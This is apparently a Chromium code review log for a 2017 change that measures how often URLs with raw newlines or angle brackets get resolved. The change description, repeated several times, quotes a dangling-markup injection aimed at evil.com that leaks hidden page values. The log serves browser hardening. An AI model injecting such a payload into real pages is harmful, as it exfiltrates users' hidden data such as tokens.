Measure URL resolution with raw newlines and braces.

Measure URL resolution with raw newlines and braces.

Because HTML is fairly lax in parsing attribute values, injecting
something like `<img src='https://evil.com/?whatever=` can expose
otherwise hidden values by eating up elements and their attributes, and
resolving them as a URL.

Perhaps we could restrict the character set allowed in `src`/`href`
attributes to bring them in-line with CSS's rules for `url('`. That
is, perhaps we should stop resolving URLs that contain raw newline
characters (`\n`)? Or braces (`<`)? Or both? It's not clear whether we
can do something about this by default, so let's add metrics and see
what we see.

BUG=680970
R=jochen@chromium.org

Review-Url: https://codereview.chromium.org/2629393002
Cr-Commit-Position: refs/heads/master@{#443793}
Committed: https://chromium.googlesource.com/chromium/src/+/63ec3598c662f32715148c25faf99771c9d1cb6c

[Mike West, 2017-01-13 14:27:52]

The CQ bit was checked by mkwst@chromium.org to run a CQ dry run

[commit-bot: I haz the power, 2017-01-13 14:28:17]

Dry run: CQ is trying da patch. Follow status at
 
https://chromium-cq-status.appspot.com/v2/patch-status/codereview.chromium.or...

[Mike West, 2017-01-13 14:30:16]

The CQ bit was unchecked by mkwst@chromium.org

[Mike West, 2017-01-13 14:32:29]

The CQ bit was checked by mkwst@chromium.org to run a CQ dry run

[commit-bot: I haz the power, 2017-01-13 14:32:44]

Dry run: CQ is trying da patch. Follow status at
 
https://chromium-cq-status.appspot.com/v2/patch-status/codereview.chromium.or...

[Mike West, 2017-01-13 14:32:47]

Mind taking a look at this, Jochen?

[commit-bot: I haz the power, 2017-01-13 16:30:45]

The CQ bit was unchecked by commit-bot@chromium.org

[commit-bot: I haz the power, 2017-01-13 16:30:46]

Dry run: This issue passed the CQ dry run.

[jochen (gone - plz use gerrit), 2017-01-13 18:52:50]

lgtm

[Mike West, 2017-01-14 06:08:14]

The CQ bit was checked by mkwst@chromium.org

[commit-bot: I haz the power, 2017-01-14 06:08:19]

CQ is trying da patch. Follow status at
 
https://chromium-cq-status.appspot.com/v2/patch-status/codereview.chromium.or...

[commit-bot: I haz the power, 2017-01-14 06:12:49]

CQ is committing da patch.

Bot data: {"patchset_id": 20001, "attempt_start_ts": 1484374094983240,
"parent_rev": "37b65afaf587c59143a6dca1ea75a505d6c696c6", "commit_rev":
"63ec3598c662f32715148c25faf99771c9d1cb6c"}

[commit-bot: I haz the power, 2017-01-14 06:14:00]

Description was changed from

==========
Measure URL resolution with raw newlines and braces.

Because HTML is fairly lax in parsing attribute values, injecting
something like `<img src='https://evil.com/?whatever=` can expose
otherwise hidden values by eating up elements and their attributes, and
resolving them as a URL.

Perhaps we could restrict the character set allowed in `src`/`href`
attributes to bring them in-line with CSS's rules for `url('`. That
is, perhaps we should stop resolving URLs that contain raw newline
characters (`\n`)? Or braces (`<`)? Or both? It's not clear whether we
can do something about this by default, so let's add metrics and see
what we see.

BUG=680970
R=jochen@chromium.org
==========

to

==========
Measure URL resolution with raw newlines and braces.

Because HTML is fairly lax in parsing attribute values, injecting
something like `<img src='https://evil.com/?whatever=` can expose
otherwise hidden values by eating up elements and their attributes, and
resolving them as a URL.

Perhaps we could restrict the character set allowed in `src`/`href`
attributes to bring them in-line with CSS's rules for `url('`. That
is, perhaps we should stop resolving URLs that contain raw newline
characters (`\n`)? Or braces (`<`)? Or both? It's not clear whether we
can do something about this by default, so let's add metrics and see
what we see.

BUG=680970
R=jochen@chromium.org

Review-Url: https://codereview.chromium.org/2629393002
Cr-Commit-Position: refs/heads/master@{#443793}
Committed:
https://chromium.googlesource.com/chromium/src/+/63ec3598c662f32715148c25faf9...
==========

[commit-bot: I haz the power, 2017-01-14 06:14:01]

Committed patchset #2 (id:20001) as
https://chromium.googlesource.com/chromium/src/+/63ec3598c662f32715148c25faf9...